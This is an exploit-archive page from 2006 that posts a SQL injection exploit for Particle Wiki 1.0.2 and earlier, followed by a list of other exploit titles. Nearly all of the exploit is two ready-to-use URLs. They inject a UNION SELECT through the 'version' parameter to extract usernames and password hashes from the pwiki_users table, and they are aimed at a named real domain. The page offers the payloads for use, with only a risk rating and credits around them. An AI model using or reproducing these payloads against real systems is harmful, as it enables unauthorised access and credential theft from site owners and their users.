exploits , vulnerabilities , articles , Particle Wiki <= 1.0.2 (version) Remote SQL Injection Vulnerability

2006-06-05

Particle Wiki <= 1.0.2 (version) Remote SQL Injection Vulnerability

Rated as : High Risk

# Particle wiki <= 1.0.2 Remote SQL_Injection - Username/Password(hash)
Extractor
# Thanks to UNSECURED SYSTEMS :
http://pridels.blogspot.com/2006/06/particle-wiki-sql-inj.html
# Exploited by FarhadKey from http://www.kapda.ir

Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,password%20from%20pwiki_users%20/*


securitydot.net - 2006-06-05

Exploits - newest 10 RSS | More

2007-06-15 57039 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34055 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42195 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29230 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19658 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16616 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19314 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16485 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33484 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17143 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit